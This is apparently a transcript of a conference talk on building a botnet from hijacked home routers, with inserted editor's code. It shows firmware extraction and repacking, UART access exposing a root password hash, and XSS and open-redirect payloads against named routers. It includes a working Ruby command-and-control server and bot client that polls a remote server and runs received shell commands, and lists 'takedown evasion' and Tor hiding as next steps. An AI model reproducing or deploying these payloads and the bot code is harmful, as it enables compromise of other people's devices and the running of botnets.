C&C Botnet Factory


Transcript of C&C Botnet Factory

Page 1: C&C Botnet Factory

NullByte-C0n C&C B0tn3t F4ct0ry

by: Torontux

1011100101001010100101010101010010101010101010010101010


Page 2: C&C Botnet Factory

# whoami

* Toronto Garcez aka Torontux

* Pentester

* IoT cell leader

* BWCon www.bwcon.com.br

Page 3: C&C Botnet Factory

# cat agenda.txt

* Motivation

* Firmwares - how to get?

  - binwalk + firmware-mod-kit

  - Cross compiling, Malta, Busybox

* Bugs + bugs + bugs ...

* C&C (cec.rb + bn.rb)

* Demo

* Next steps

Page 4: C&C Botnet Factory

# wget http://pastebin.com/raw/0SNSvyjJ

[ASCII-art banner from the guide: "Hack Back! A DIY Guide", with a cow figure and the letters HT, tagged #antisec]

Page 5: C&C Botnet Factory

# cat hacklog.txt

“So, I had three options: look for a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the embedded devices. A 0day in an embedded device seemed like the easiest option, and after two weeks of work reverse engineering, I got a remote root exploit.”

“I did a lot of work and testing before using the exploit against Hacking Team. I wrote a backdoored firmware, and compiled various post-exploitation tools for the embedded device.”

Page 6: C&C Botnet Factory

# man firmwares

* Download firmware updates from the vendor

* Extract over serial (UART)

* Look for the filesystem inside the image

Page 7: C&C Botnet Factory

# man firmwares

* binwalk + hexdump + firmware-mod-kit

* Look for big chunks of 00s or FFs delimiting the parts

* Check for common compression stream patterns

-> zlib: 78 01, 78 9C, 78 DA
-> gzip: 1F 8B
-> LZMA: 5D 00 00 80 (properties byte 0x5D followed by the little-endian dictionary size, here 8 MiB; the WR740N image on the next slides uses a 32 MiB dictionary, so it starts 5D 00 00 00 02)

The two-byte zlib and gzip signatures match random data often, so only trust them right after a padding run; the LZMA header and the squashfs magic ("hsqs") are far more specific.

* Offset to extract the filesystem

* squashfs

Page 8: C&C Botnet Factory

# hexdump -C wr740nv6.bin | more

00000000  01 00 00 00 54 50 2d 4c 49 4e 4b 20 54 65 63 68  |....TP-LINK Tech|
00000010  6e 6f 6c 6f 67 69 65 73 00 00 00 00 76 65 72 2e  |nologies....ver.|
00000020  20 31 2e 30 00 00 00 00 00 00 00 00 00 00 00 00  | 1.0............|
00000030  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  |................|
00000040  07 40 00 06 00 00 00 01 00 00 00 00 df 34 0f 03  |.@...........4..|
00000050  18 76 7d 82 2f 96 05 35 43 b2 be 7b 00 00 00 00  |.v}./..5C..{....|
00000060  d6 3b e9 70 2e 5b ca 44 4a e9 a7 33 e1 d9 9b ee  |.;.p.[.DJ..3....|
00000070  00 00 00 00 80 00 20 00 80 1c cf b0 00 3e 02 00  |...... ......>..|

...

00120200  68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00  |hsqsS...t..V....|
00120210  29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00  |)...............|
00120220  0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00  |..[.....+.*.....|
00120230  23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff  |#.*.............|

...

The squashfs superblock starts at 0x120200: "hsqs" is the little-endian magic, the next word (53 02 00 00) is the inode count (595) and 2b e6 2a 00 ... at 0x120228 is bytes_used (2811435). That offset is what the dd on the next slide cuts at.

...

Page 9: C&C Botnet Factory

# binwalk wr740nv6_br.bin

DECIMAL       HEX         DESCRIPTION
---------------------------------------------------------------------
0             0x0         TP-Link firmware header, firmware version: 0.-15447.3, ...
13424         0x3470      U-Boot version string, U-Boot 1.1.4
13472         0x34A0      CRC32 polynomial table, big endian
14784         0x39C0      uImage header, OS: Linux, CPU: MIPS, compression type: lzma, image name: "u-boot image"
14848         0x3A00      LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 93336 bytes
131584        0x20200     TP-Link firmware header, firmware version: 0.0.3
132096        0x20400     LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2495224 bytes
1180160       0x120200    Squashfs filesystem, little endian, version 4.0
...

# dd if=wr740nv6_br.bin skip=1 bs=1180160 of=filesystem.squashfs
2+1 records in
2+1 records out
2883584 bytes (2.9 MB) copied, 0.0106605 s, 270 MB/s
# file filesystem.squashfs
filesystem.squashfs: Squashfs filesystem, little endian, version 4.0,

Setting bs to the squashfs offset and skip=1 skips exactly 1180160 bytes in one step, so everything from the superblock to the end of the image (including the trailing padding) lands in filesystem.squashfs.
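Added example (editor's code, not from the talk): a small binwalk-style carver in Ruby that applies the heuristics of the "man firmwares" slide (padding runs of 00/FF delimit the parts; LZMA, zlib, gzip and squashfs signatures mark where each starts), decodes the squashfs superblock and carves the filesystem the way the dd line does. The superblock bytes are the ones from the hexdump at 0x120200 (the slide shows 64 of the 96 bytes; the remaining table offsets are zero-filled here), so the parser reproduces the 595 inodes, 131072-byte blocks, lzma compression and 2811435-byte size that binwalk prints. The rest of the sample image is constructed filler, not a real TP-Link file, and the function and constant names are the editor's.

```ruby
require "set"
require "time"

SQUASHFS_SB_SIZE = 96   # squashfs 4.x superblock, little endian ("hsqs")
SQUASHFS_COMPRESSORS = { 1 => "gzip", 2 => "lzma", 3 => "lzo", 4 => "xz", 5 => "lz4", 6 => "zstd" }.freeze

# Offsets right after a run of >= min_run identical 0x00 or 0xFF bytes: the
# "big chunks of 00s or FFs" that delimit the parts of a vendor image.
def padding_boundaries(blob, min_run: 64)
  bounds = []
  i = 0
  while i < blob.bytesize
    b = blob.getbyte(i)
    if b == 0x00 || b == 0xff
      j = i
      j += 1 while j < blob.bytesize && blob.getbyte(j) == b
      bounds << j if j - i >= min_run && j < blob.bytesize
      i = j
    else
      i += 1
    end
  end
  bounds
end

# Name of the stream starting at `off`, or nil.  The 2-byte zlib/gzip magics
# match random data far too often, so they only count right after padding.
def magic_at(blob, off, after_padding: false)
  head = blob.byteslice(off, 5).to_s
  return "squashfs (little endian)" if head.start_with?("hsqs")
  return "squashfs (big endian)"    if head.start_with?("sqsh")
  if head.bytesize >= 5 && head.getbyte(0) == 0x5d     # LZMA properties byte 0x5D ...
    dict = head.byteslice(1, 4).unpack1("V")            # ... then the dictionary size
    return "lzma (dict #{dict} bytes)" if dict > 0 && (dict & (dict - 1)) == 0
  end
  return nil unless after_padding
  return "gzip" if head.start_with?("\x1f\x8b".b)
  return "zlib" if ["\x78\x01", "\x78\x9c", "\x78\xda"].any? { |m| head.start_with?(m.b) }
  nil
end

# binwalk-style listing: [[offset, description], ...] in file order.
def scan(blob)
  after_padding = padding_boundaries(blob).to_set
  (0...blob.bytesize).filter_map do |off|
    desc = magic_at(blob, off, after_padding: after_padding.include?(off))
    [off, desc] if desc
  end
end

# Decode the superblock fields (layout from the kernel's squashfs_fs.h).
def parse_squashfs_superblock(blob, off)
  sb = blob.byteslice(off, SQUASHFS_SB_SIZE).to_s
  raise ArgumentError, "truncated superblock at #{off}" if sb.bytesize < SQUASHFS_SB_SIZE
  magic, inodes, mtime, block_size, fragments,
    compression, block_log, flags, no_ids, major, minor,
    _root_inode, bytes_used, _id_table, xattr_table = sb.unpack("V5v6Q<4")
  raise ArgumentError, "no squashfs magic at #{off}" unless magic == 0x73717368
  raise ArgumentError, "corrupt superblock: block_size != 2**block_log" unless block_size == 1 << block_log
  {
    version: "#{major}.#{minor}", inodes: inodes, created: Time.at(mtime).utc,
    block_size: block_size, fragments: fragments, id_count: no_ids, flags: flags,
    compression: SQUASHFS_COMPRESSORS.fetch(compression) { "unknown(#{compression})" },
    bytes_used: bytes_used, xattrs: xattr_table != 0xffff_ffff_ffff_ffff,
  }
end

# Same cut as `dd if=fw bs=<offset> skip=1`, but bounded by bytes_used rounded
# up to 4 KiB (mksquashfs pads to that).  A short image is reported, not hidden.
def carve_squashfs(blob, off)
  sb    = parse_squashfs_superblock(blob, off)
  want  = (sb[:bytes_used] + 4095) / 4096 * 4096
  avail = blob.bytesize - off
  { data: blob.byteslice(off, [want, avail].min), expected: want, truncated: want > avail }
end

# The superblock as it appears in the slide's hexdump at 0x120200 (64 bytes);
# the remaining 32 bytes (table offsets) are not on the slide and are zeroed.
SLIDE_SUPERBLOCK = %w[
  68 73 71 73 53 02 00 00 74 d1 1c 56 00 00 02 00
  29 00 00 00 02 00 11 00 e0 00 01 00 04 00 00 00
  0b 0b 5b 0e 00 00 00 00 2b e6 2a 00 00 00 00 00
  23 e6 2a 00 00 00 00 00 ff ff ff ff ff ff ff ff
].map { |h| h.to_i(16) }.pack("C*") + ("\x00".b * 32)

# Constructed stand-in for a firmware image (not a real TP-Link file): header,
# an LZMA "kernel", zero padding, the superblock above with filler, erased flash.
def sample_firmware
  header = "\x01\x00\x00\x00TP-LINK Technologies".b.ljust(128, "\x00".b)
  kernel = [0x5d, 0, 0, 0x80, 0].pack("C*") + ("\xff".b * 8) + ("kernel..".b * 8)
  rootfs = SLIDE_SUPERBLOCK + ("\xab".b * 3000)
  header + kernel + ("\x00".b * 256) + rootfs + ("\xff".b * 128)
end

if __FILE__ == $PROGRAM_NAME
  blob = ARGV[0] ? File.binread(ARGV[0]) : sample_firmware
  scan(blob).each { |off, desc| printf("%-10d 0x%-8X %s\n", off, off, desc) }
  sq = scan(blob).find { |_, d| d.start_with?("squashfs") }
  p parse_squashfs_superblock(blob, sq.first) if sq
end
```

Run as `ruby carve.rb wr740nv6_br.bin` (the script name is an assumption) to list the parts of a real image; with no argument it scans the built-in sample. On the real image the carve cuts at the same offset as the dd above but stops at bytes_used rounded to 4 KiB instead of the end of the file; the sample is deliberately shorter than bytes_used, which the carve reports as truncated rather than silently returning a short filesystem.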

Page 10: C&C Botnet Factory

# binwalk -e wr740nv6_br.bin

DECIMAL       HEX         DESCRIPTION
--------------------------------------------------------------------------
0             0x0         TP-Link firmware header, firmware version: 0.-15447.3, ...
...
1180160       0x120200    Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2811435 bytes, 595 inodes, blocksize: 131072 bytes, created: 2015-10-13 09:40:04

# ls -lhs _wr740nv6_br.bin.extracted/squashfs-root/
total 52K
4.0K drwxr-xr-x  2 root root 4.0K Sep 21  2015 bin
4.0K drwxr-xr-x  3 root root 4.0K Sep 21  2015 dev
4.0K drwxr-xr-x  7 root root 4.0K Sep 21  2015 etc
4.0K drwxr-xr-x  5 root root 4.0K Sep 21  2015 lib
   0 lrwxrwxrwx  1 root root   11 Nov 15 13:57 linuxrc -> bin/busybox
4.0K drwxr-xr-x  2 root root 4.0K Sep 21  2015 mnt
4.0K drwxr-xr-x  2 root root 4.0K Sep 21  2015 proc
4.0K drwxr-xr-x  2 root root 4.0K Sep 21  2015 root
4.0K drwxr-xr-x  2 root root 4.0K Sep 21  2015 sbin
4.0K drwxr-xr-x  2 root root 4.0K Sep 21  2015 sys
4.0K drwxrwxrwt  2 root root 4.0K Sep 21  2015 tmp
4.0K drwxr-xr-x  4 root root 4.0K Sep 21  2015 usr
4.0K drwxr-xr-x  3 root root 4.0K Sep 21  2015 var
4.0K drwxr-xr-x 10 root root 4.0K Oct 13  2015 web

Page 11: C&C Botnet Factory

# binwalk wr720nv2-en-up.bin

DECIMAL       HEXADECIMAL   DESCRIPTION
------------------------------------------------------------------
20            0x14          IMG0 (VxWorks) header, size: 1559872
26740         0x6874        VxWorks operating system version "5.5.1", compiled: "Jun 18 2013, 12:19:11"
26836         0x68D4        LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 636256 bytes
262292        0x40094       IMG0 (VxWorks) header, size: 1297600
262420        0x40114       LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3657936 bytes
1256228       0x132B24      Wind River management filesystem, compressed, 194 files
1265584       0x134FB0      LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 14696 bytes
1268652       0x135BAC      LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 629 bytes
1268992       0x135D00      LZMA compressed data, properties: 0x5A, dictionary size: 8388608 bytes, uncompressed size: 2731 bytes

Not every router is Linux: the WR720N v2 runs VxWorks, so there is no squashfs root filesystem to unpack and the firmware-mod-kit flow on the next slide does not apply to it.

Page 12: C&C Botnet Factory

# man firmware-mod-kit

./extract-firmware.sh wr740nv6_br.bin

fmk/rootfs/
fmk/new-filesystem.squashfs
fmk/logs/config.log
fmk/logs/binwalk.log
fmk/image_parts/header.img
fmk/image_parts/rootfs.img

(edit fmk/rootfs/, then)

./build-firmware.sh

fmk/new-firmware.bin

Page 13: C&C Botnet Factory

# man cross compiling | grep mips

* gcc-mips-linux-gnu

* -static (the binary grows, but it does not depend on the device's libc, which is usually uClibc rather than the toolchain's glibc)

* strip

* Tks Rafael Machado ;)

root@debian-mips:~# ls -lhsa
4.0K drwx------  5 root root 4.0K Nov 25 18:18 .
4.0K drwxr-xr-x 21 root root 4.0K Dec  8  2013 ..
664K -rwxr-xr-x  1 root root 657K Nov 25 18:18 teste
root@debian-mips:~# strip teste
root@debian-mips:~# ls -lhsa
4.0K drwx------  5 root root 4.0K Nov 25 18:18 .
4.0K drwxr-xr-x 21 root root 4.0K Dec  8  2013 ..
608K -rwxr-xr-x  1 root root 604K Nov 25 18:19 teste

Page 14: C&C Botnet Factory

# man qemu | grep mips

* https://www.linux-mips.org/wiki/MIPS_Malta

* Debian Squeeze and Wheezy mips images for QEMU: https://people.debian.org/~aurel32/qemu/mips/

qemu-system-mips -M malta -m 256 \
  -kernel vmlinux-2.6.32-5-4kc-malta \
  -hda debian_squeeze_mips_standard.qcow2 \
  -append "root=/dev/sda1 console=tty0" \
  -vnc 172.16.68.128:0 \
  -net nic -net user,hostfwd=tcp::2222-:22

(hostfwd=tcp::2222-:22 exposes the guest's sshd on host port 2222, so cross-compiled binaries can be copied in with scp -P 2222 and tried on a real MIPS userland before touching the device)

[email protected]'s password:
Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips
Last login: Fri Nov 25 17:19:33 2016
root@debian-mips:~# uname -a
Linux debian-mips 2.6.32-5-4kc-malta #1 Tue Sep 24 00:02:22 UTC 2013 mips GNU/Linux

Page 15: C&C Botnet Factory

# cd busybox && make menuconfig

Page 16: C&C Botnet Factory

# man UART

TP-Link TL-WR841ND

- 2 detachable antennas
- 4-port 10/100 switch
- 1 10/100 WAN port
- 4 MB flash
- 32 MB RAM
- WPS button
- Wi-Fi on/off button

* Tks Osvaldo! ;)

Page 17: C&C Botnet Factory

# man UART

* Find RX/TX/GND/VCC

* VCC 3.3 V (power the board normally and connect only GND, RX and TX from the adapter)

* GND 0 V

* TX idles at about 3 V (use a 3.3 V adapter, not a 5 V one)

* Baud rate 115200

cat /etc/shadow

root:$1$GTN.gpri$DlSyKvZKMR9A9Uj9e9wR3/:15502:0:99999:7:::

($1$ is md5crypt with salt GTN.gpri: a fast hash, so a root password pulled off the console like this is an easy offline cracking target.)

Page 18: C&C Botnet Factory

# cat bugs.txt

* looking for bugs:

- Web applications (XSS,CSRF,LFI,RCE,etc...)

- Memory Corruptions

- Hardcoded passwords and Default credentials

- Backdoors

- Information disclosure

Page 19: C&C Botnet Factory

# cat totolink_payload.txt

POST /login.cgi HTTP/1.1
Host: 192.168.1.1
Referer: http://192.168.1.1/login.htm
Cookie: SessionID=

username=admin&password=%22%3E%3Cscript%3Ealert%28%22NullByte%22%29%3B%3C%2Fscript%3E&submit.htm%3Flogin.htm=Send

(the password field decodes to "><script>alert("NullByte");</script>: it is reflected into the page unescaped, so the quote closes the attribute and the script tag runs)

Page 20: C&C Botnet Factory

# cat linkOne_payloads.txt

GET /goform/SafeWanWebMan?GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0"%3balert(1)%2f%2f HTTP/1.1
Host: 192.168.0.1
Cookie: language=en; admin:language=en
Connection: keep-alive

(IP decodes to 0.0.0.0";alert(1)//, which closes a JavaScript string literal, runs the payload and comments out the rest of the line)

POST /goform/SysStatusHandle HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Referer: http://192.168.0.1/system_status.asp
Cookie: language=en; admin:language=en

CMD=WAN_CON&GO=system_status.asp&action=;alert(1);

Page 21: C&C Botnet Factory

# cat linkOne_payloads2.txt

Open Redirect
-------------
GET /goform/SysStatusHandle?CMD=&GO=http://www.evil.com.br&action= HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: language=en; admin:language=en
Connection: close
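Added example, editor's code and not the routers' firmware (their goform handlers are native code and are not on the page): the bug classes behind the TOTOLINK and link-one payloads on the last three slides, written as Ruby CGI-style handlers, each next to a hardened version. The function names, the ALLOWED_PAGES list and the page names in it are assumptions; the two query strings are copied from the slides.

```ruby
require "cgi"
require "json"
require "ipaddr"

# Query string (or form body) -> {name => value}, as a CGI handler sees it.
def params_from_query(query)
  CGI.parse(query).transform_values(&:first)
end

# Constructed stand-in for the router's /goform/SafeWanWebMan handler.
# Vulnerable: IP and port are pasted into inline JavaScript as-is, so
# IP=0.0.0.0";alert(1)// closes the string literal and runs attacker script.
def remote_mgmt_page_vulnerable(p)
  "<script>var remoteIp = \"#{p['IP']}\"; var remotePort = #{p['port']};</script>"
end

# Hardened: validate to the type the field must hold (an address, a port),
# then still encode for the JS string context.  "/" is escaped so a value
# can never contain a literal "</script>" that would end the block early.
def remote_mgmt_page_safe(p)
  ip   = IPAddr.new(p["IP"].to_s)                     # raises IPAddr::InvalidAddressError
  port = Integer(p["port"].to_s, 10, exception: false)
  raise ArgumentError, "port out of range" unless port && (1..65535).cover?(port)
  js_ip = JSON.generate(ip.to_s).gsub("/", "\\/")
  "<script>var remoteIp = #{js_ip}; var remotePort = #{port};</script>"
end

# Constructed stand-in for /goform/SysStatusHandle.  Vulnerable: GO goes
# straight into Location, which is an open redirect and, with a CR/LF in
# GO, a response header injection as well.
def status_redirect_vulnerable(p)
  "HTTP/1.1 302 Found\r\nLocation: #{p['GO']}\r\n\r\n"
end

ALLOWED_PAGES = %w[index.asp system_status.asp system_remote.asp].freeze

# Hardened: GO may only name one of the device's own pages; anything else
# (absolute URLs, "//host", CR/LF, "..") lands on the index instead.
def status_redirect_safe(p)
  page = ALLOWED_PAGES.include?(p["GO"]) ? p["GO"] : "index.asp"
  "HTTP/1.1 302 Found\r\nLocation: /#{page}\r\n\r\n"
end

# Query strings copied from the slides.
XSS_QUERY      = %q{GO=system_remote.asp&RMEN=1&port=8080&IP=0.0.0.0"%3balert(1)%2f%2f}
REDIRECT_QUERY = "CMD=&GO=http://www.evil.com.br&action="

if __FILE__ == $PROGRAM_NAME
  puts remote_mgmt_page_vulnerable(params_from_query(XSS_QUERY))
  puts status_redirect_vulnerable(params_from_query(REDIRECT_QUERY)).inspect
  puts status_redirect_safe(params_from_query(REDIRECT_QUERY)).inspect
end
```

The fix is two layers on purpose: type validation rejects the payload outright (an address with a quote in it is not an address), and context-aware encoding covers whatever validation lets through. The TOTOLINK login page is the same class in an HTML attribute context; there ERB::Util.html_escape on the reflected value is the encoding step. For the redirect, an allowlist of page names is simpler and safer than trying to parse and filter URLs.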

Page 22: C&C Botnet Factory

# man cec

* Command and Control

* Ruby

* Client and Server (cec.rb and bn.rb)

* HTTP

* No frameworks (plain CGI)

Page 23: C&C Botnet Factory

# man cec

[Diagram: the C&C server on one side and the C&C client on the other, with bot.sh on the client side; the edges between them are labelled "commands" and "5s" (three times)]
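Added example, editor's code, not the cec.rb/bn.rb from the demo (they are not on the page): a command-and-control exchange over plain HTTP with no framework, as the two slides above describe it, with both sides' messages spelled out. The wire format (GET /cmd and POST /result with an id query parameter, 204 when nothing is queued), the class names and the host name are assumptions; the 5-second poll is the interval on the diagram.

```ruby
require "socket"
require "uri"
require "cgi"

POLL_INTERVAL = 5   # the "5s" edges in the diagram

# Server side (the role of cec.rb): one command queue per bot id, results
# kept per bot.  Speaks raw HTTP/1.1 so it can sit behind a CGI wrapper or
# a bare TCPServer.  Assumed wire format:
#   GET  /cmd?id=<bot>     -> 200 + command text, or 204 when nothing is queued
#   POST /result?id=<bot>  -> 200; the request body is the command's output
class CecServer
  def initialize
    @queue   = Hash.new { |h, k| h[k] = [] }
    @results = Hash.new { |h, k| h[k] = [] }
  end

  def push(bot, cmd)
    @queue[bot] << cmd
  end

  def results(bot)
    @results[bot]
  end

  # One raw request string in, one raw response string out.
  def handle(raw)
    head, body = raw.to_s.split("\r\n\r\n", 2)
    request_line, *header_lines = head.to_s.split("\r\n")
    method, target, _version = request_line.to_s.split(" ", 3)
    headers = header_lines.to_h { |l| k, v = l.split(":", 2); [k.strip.downcase, v.to_s.strip] }
    body = body.to_s.byteslice(0, headers["content-length"].to_i)
    begin
      uri = URI.parse(target.to_s)
    rescue URI::InvalidURIError
      return respond(400, "bad target")
    end
    bot = CGI.parse(uri.query.to_s)["id"].first
    return respond(400, "missing id") unless bot&.match?(/\A[\w.-]{1,64}\z/)
    case [method, uri.path]
    when ["GET", "/cmd"]
      cmd = @queue[bot].shift
      cmd ? respond(200, cmd) : respond(204, "")
    when ["POST", "/result"]
      @results[bot] << body
      respond(200, "ok")
    else
      respond(404, "not found")
    end
  end

  private

  def respond(code, body)
    reason = { 200 => "OK", 204 => "No Content", 400 => "Bad Request", 404 => "Not Found" }[code]
    "HTTP/1.1 #{code} #{reason}\r\nContent-Type: text/plain\r\n" \
      "Content-Length: #{body.bytesize}\r\nConnection: close\r\n\r\n#{body}"
  end
end

# Client side (the role of bn.rb): poll, run what comes back, post the output.
class BotClient
  DEFAULT_RUNNER = ->(cmd) { IO.popen(["sh", "-c", cmd], err: [:child, :out], &:read) }

  # transport: raw request -> raw response (a TCP socket, or in-process for tests)
  def initialize(id, transport:, runner: DEFAULT_RUNNER, sleeper: ->(s) { sleep(s) })
    @id, @transport, @runner, @sleeper = id, transport, runner, sleeper
  end

  def request(method, path, body = "")
    "#{method} #{path}?id=#{CGI.escape(@id)} HTTP/1.1\r\nHost: cec\r\n" \
      "Content-Length: #{body.bytesize}\r\nConnection: close\r\n\r\n#{body}"
  end

  # One round trip; returns the command that was run, or nil when idle.
  def poll
    status, cmd = parse(@transport.call(request("GET", "/cmd")))
    return nil unless status == 200 && !cmd.empty?
    @transport.call(request("POST", "/result", @runner.call(cmd)))
    cmd
  end

  # The loop from the diagram: poll, wait POLL_INTERVAL, repeat (rounds: nil = forever).
  def run(rounds: nil)
    loop do
      poll
      break if rounds && (rounds -= 1) <= 0
      @sleeper.call(POLL_INTERVAL)
    end
  end

  private

  def parse(raw)
    head, body = raw.to_s.split("\r\n\r\n", 2)
    [head.to_s[%r{\AHTTP/1\.1 (\d{3})}, 1].to_i, body.to_s]
  end
end

# The same request and response over a real socket (host and port are assumptions).
def tcp_transport(host, port)
  ->(raw) { TCPSocket.open(host, port) { |s| s.write(raw); s.read } }
end
```

Over the network, `tcp_transport` sends exactly these bytes to a server that wraps `handle` in a TCPServer accept loop (read the header block with gets("\r\n\r\n"), then Content-Length bytes, write the response, close). Note what this design lacks before any real use: nothing authenticates either side, so anyone who finds the server can fetch or forge commands and results, and on plain HTTP a man in the middle can inject commands; that is the "cryptography" item on the next-steps slide, and a shared-key MAC over every message is the minimum.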

Page 24: C&C Botnet Factory

# ./demo

Page 25: C&C Botnet Factory

# cat next_steps.txt

* Fix bugs

* Code refactor

* More features

* Cryptography

* Clients to ARM / MIPS / etc...

* Takedown evasion

Page 26: C&C Botnet Factory

# man tor2web

* https://www.tor2web.org/

“Tor is a software project that lets you anonymously browse the Internet. Tor2web is a project to let Internet users access Tor Onion Services without using Tor Browser”

* replace .onion with .onion.to or .onion.city or .onion.cab or .onion.direct

* Anonymity for the server

* eqt5g4fuenphqinx.onion

* End-to-end encryption

Caveat: the Tor2web gateway terminates the client's HTTPS connection and opens its own Tor circuit to the onion service, so the gateway operator sees the traffic in clear and can alter it; the encryption is hop-by-hop through the proxy, not end-to-end between the client and the onion service.

Page 27: C&C Botnet Factory

Questions?